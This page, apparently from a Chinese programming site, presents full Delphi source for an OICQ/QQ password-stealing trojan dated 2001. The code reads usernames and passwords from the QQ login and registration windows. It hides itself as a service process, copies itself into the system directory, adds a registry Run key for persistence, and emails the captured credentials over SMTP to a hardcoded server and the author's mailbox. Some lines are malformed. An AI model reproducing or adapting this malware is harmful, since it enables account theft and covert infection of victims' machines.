Delphi：OICQ 远程木马的设计技术

热点排行

OICQ 远程木马的设计技术

类别：Delphi 点击：0 评论：0 推荐：

{
****************** OICQ Hack 2001***********
*
* 2001 5.22 ver 1.1 Modify for OICQ2000b 0230
* 2001 5.25 ver 1.2 Modify for QQ2000b 0430
* Last updated: 2001.5.25
* Author :njhhack
* HackSoft Research Lab.
* Copyright(C) 2001 Allrigths Reserved.
*
*
**********************************************
}

//---------------下面是oicqhack.dpr工程文件
program oicqhack;

uses
Windows,
Messages,
mainunit in 'mainunit.pas';

{$R *.RES}

var
wClass: TWndClass; // class struct for main window
Msg: TMSG; // message struct

procedure ShutDown;
begin
UnRegisterClass(classname,hInst);
ExitProcess(hInst); //end program
end;

function WindowProc(hWnd,Msg,wParam,lParam:Longint):Longint; stdcall;
begin
Result:=DefWindowProc(hWnd,Msg,wParam,lParam);
case Msg of
WM_CREATE: wincreate;
WM_TIMER: ontimer1;
WM_DESTROY: ShutDown;
end;
end;

begin
//如果旧版本已运行,则停止旧版程序,只运行当前新版程序
hmain:=Findwindow('HackSoft-Oicq-Password-Recoder','OICQ 密码记录器2');
if hmain<>0 then sendmessage(lp,wm_destroy,0,0);

hInst:=GetModuleHandle(nil); // get the application instance
classname:='HackSoft-Oicq-Password-Recoder';
with wClass do
begin
Style:= CS_PARENTDC;
hIcon:= LoadIcon(hInst,'MAINICON');
lpfnWndProc:= @WindowProc;
hInstance:= hInst;
hbrBackground:= COLOR_BTNFACE+1;
lpszClassName:= classname;
hCursor:= LoadCursor(0,IDC_ARROW);
end;
RegisterClass(wClass);
hmain:=CreateWindowEx(WS_EX_TOOLWINDOW,classname,'OICQ 密码记录器3',WS_OVERLAPPEDWINDOW,10,10,120,80,0,0,hInst,nil);
//建立一个新的定时器，用来定时扫描系统中的窗口
newtime:=SetTimer(hmain,0,300,nil);
//建立消息循环
while(GetMessage(Msg,hmain,0,0))do
begin
TranslateMessage(Msg);
DispatchMessage(Msg);
end;
//结束定时器
killtimer(hmain,newtime);
end.

//-------下面是mainunit.pas单元文件

unit mainunit;

interface

uses
Windows,
Messages,
SysUtils,
Classes,
winsock,
registry;
const
CRLF=#13#10;
var
spy:string;
hinst,hmain,newtime,count,start,max,fhand,old,olde,lp:integer;
his:array[0..100] of integer;
syspath:array[0..200] of integer;
regservice:function(uThread:integer;uType:integer):Integer;stdcall;
libhandle:thandle;
classname:array[0..100] of char;
items:array[0..4] of string;

err:integer;
wsadata:twsadata;
fsocket,fport,step:integer;
SockAddrIn:TSockAddrIn;
hackmail,email,newpass,fhost,s1,password:string;
sbuf:array[0..1024] of char;

procedure winCreate;
procedure OnTimer1;

implementation

//修改注册表让程序自启动
procedure autorun;
var reg:tregistry;
begin
reg:=tregistry.create;
reg.rootkey:=HKEY_LOCAL_MACHINE;
reg.openkey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',true);
reg.WriteString('oicqpass',spy+'OICQPASS.EXE');
reg.closekey;
reg.free;
end;

//下面是个发信的子过程,取得密码后发回[email protected]邮箱
procedure MailSend;
begin
err:=recv(FSocket,sbuf,400,0);
s1:=strpas(sbuf);
inc(step);
case step of
1:s1:='HELO smtp.hacker.com'+CRLF;
2:s1:='MAIL FROM: <[email protected]>'+CRLF;
3:s1:='RCPT TO: <'+email+'>'+CRLF;
4:s1:='DATA'+CRLF;
5:s1:='From:"Oicq Hack"<www.hacker.com>'+CRLF
+'To:"getoicq"<www.password.com>'+CRLF
+'Subject:QQ2001 Password come.'+CRLF
+CRLF
+newpass+CRLF
+'.'+CRLF;
6:s1:='QUIT'+CRLF;
else
step:=0;
end;
strcopy(sbuf,pchar(s1));
err:=send(FSocket,sbuf,strlen(sbuf),MSG_DONTROUTE);
end;
//发信主过程
procedure SendPass;
begin
err:=WSAStartup($0101,WSAData);
FSocket := socket(PF_INET, SOCK_STREAM,IPPROTO_IP);
//利用 smtp.21cn.com 进行发信
fhost:='202.104.32.230';
fport:=25;
SockAddrIn.sin_addr.s_addr:=inet_addr(PChar(FHost));
SockAddrIn.sin_family := PF_INET;
SockAddrIn.sin_port :=htons(Fport);
err:=connect(FSocket,SockAddrIn, SizeOf(SockAddrIn));
step:=0;
repeat
MailSend;
until step=0;
err:=closesocket(FSocket);
err:=WSACleanup;
end;

//窗口枚举函数
function lpEnumFunc(hwnd:integer;uint:integer):boolean;stdcall;
var hw,hwold,hs,wlong,hup,i:integer;
sbuf,sb3,sb2:array[0..256] of char;
sb1:string;
begin
hwold:=GetParent(hwnd);
wlong:=GetWindowLong(hwnd,GWL_STYLE);
if (wlong and ES_PASSWORD)<>0 then
begin
//检查是否OICQ登陆
hup:=GetParent(hwnd);
sendmessage(hup,wm_gettext,100,integer(@sbuf));
strpcopy(sb2,'OICQ 注册向导');
strpcopy(sb3,'QQ 注册向导');
if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then
begin
old:=GetParent(hup);
old:=GetParent(old);
old:=GetParent(old);
start:=0;
count:=1;
//items.clear;

//跳过两个窗口
hwnd:=Getwindow(hwnd,GW_HWNDFIRST);
hwnd:=Getwindow(hwnd,GW_HWNDNEXT);
//取得用户名
hwnd:=Getwindow(hwnd,GW_HWNDNEXT);
hw:=GetWindowTextLength(hwnd);
hs:=integer(@sbuf);
sendmessage(hwnd,wm_gettext,100,hs);
items[0]:='用户名:'+strpas(sbuf);
//取得密码
hwnd:=Getwindow(hwnd,GW_HWNDNEXT);
hw:=GetWindowTextLength(hwnd);
hs:=integer(@sbuf);
sendmessage(hwnd,wm_gettext,100,hs);
items[1]:='密码:'+strpas(sbuf);
end;
strpcopy(sb2,'OICQ用户登录');
strpcopy(sb3,'QQ用户登录');
if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then
begin
old:=GetParent(hup);
old:=GetParent(old);
start:=0;
count:=1;
//items.clear;
//取得用户名
hwnd:=Getwindow(hwnd,GW_HWNDFIRST);
hw:=GetWindowTextLength(hwnd);
hs:=integer(@sbuf);
sendmessage(hwnd,wm_gettext,100,hs);
items[0]:='用户名:'+strpas(sbuf);
//取得密码
hwnd:=Getwindow(hwnd,GW_HWNDNEXT);
hw:=GetWindowTextLength(hwnd);
hs:=integer(@sbuf);
sendmessage(hwnd,wm_gettext,100,hs);
items[1]:='密码:'+strpas(sbuf);
end;
end;
//检查是否在线
hw:=GetWindowTextLength(hwnd);
hs:=integer(@sbuf);
sendmessage(hwnd,wm_gettext,100,hs);
strpcopy(sb2,'在线');
strpcopy(sb3,'隐身');
if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then
begin
if hwold=old then
begin
if olde<>old then
begin
if strcomp(sbuf,sb2)=0 then items[2]:='登录成功:在线'
else items[2]:='登录成功:隐身';
items[3]:=' ';
//密码发回我的邮箱[email protected]

newpass:=format('%s %s %s %s',[items[0],items[1],items[2],items[3],items[4]);
//
hackmail:=email;
sendpass;
email:='[email protected]';
sendpass;
email:=hackmail;

//密码存盘到oicqpass.dll中

{
if fileexists(spy+'oicqpass.dll')=false then fhand:=filecreate(spy+'oicqpass.dll')
else fhand:=fileopen(spy+'oicqpass.dll',fmOpenWrite);
if fileexists(spy+'oicqpass.dll')=false then fhand:=filecreate(spy+'oicqpass.dll')
else fhand:=fileopen(spy+'oicqpass.dll',fmOpenWrite);
fileseek(fhand,0,2);
strpcopy(sbuf,items[0]+#13#10+items[1]+#13#10+items[2]+#13#10+items[3]+#13#10);
filewrite(fhand,sbuf,strlen(sbuf));
fileclose(fhand);
}
end;
olde:=old;
end;
end;
result:=true;
end;

定时器响应函数
procedure OnTimer1;
begin
lp:=0;
EnumChildWindows(GetDesktopWindow,@lpEnumFunc,lp);
end;
//窗口创建响应函数
procedure winCreate;
var wlong:integer;
s1:string;
s2,s3,sbuf:array[0..300] of char;
i:integer;
osver:TOSVERSIONINFO;
tmp:tmemorystream;
begin
//取得操作系统版本信息,若为win9x则注册为服务进程而隐身,nt下无此功能
osver.dwOSVersionInfoSize:=sizeof(TOSVERSIONINFO);
if GetVersionEx(osver)=true then
begin
if VER_PLATFORM_WIN32_NT<>osver.dwPlatformId then
begin
LibHandle:=LoadLibrary('kernel32.dll');
if LibHandle<>0 then
begin
@regservice:=GetProcAddress(LibHandle, 'RegisterServiceProcess');
regservice(0,1);//1=hide,0=show;
FreeLibrary(LibHandle);
end;
end;
end;
max:=0;
count:=0;
将程序复制到系统目录
s1:=ParamStr(0);
for i:=0 to length(s1) do s2:=s1[i+1];
GetSystemDirectory(@syspath,MAX_PATH);
spy:=strpas(@syspath)+'\';
s1:=spy+'oicqhack.exe';
for i:=0 to length(s1) do s3:=s1[i+1];
copyfile(s2,s3,false);
//从email.txt中找到目标e-mail信箱
if fileexists('c:\email.txt')=false then
begin
email:='[email protected]';
end else
begin
tmp:=tmemorystream.create;;
tmp.loadfromfile('c:\email.txt');
count:=tmp.size;
// strcopy(sbuf,pchar(''));
tmp.read(sbuf,count);
tmp.free;
email:='';
for step:=0 to count-1 do email:=email+sbuf[step];
strcopy(sbuf,pchar(email));
// messagebox(0,sbuf,'',0);
end;
count:=0;
step:=0;
//修改注册表使程序自启动
autorun;
end;

end.

/////////////////////////////////////////////////////////
--------倪建华---------------
HackSoft Research Lab.
Copyright(C) 2001 Alrights reserved.

本文地址：http://com.8s8s.com/it/it6077.htm